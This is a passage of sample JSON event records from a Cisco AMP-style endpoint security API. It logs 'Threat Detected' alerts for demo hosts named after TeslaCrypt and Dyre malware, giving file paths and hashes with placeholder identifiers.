Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 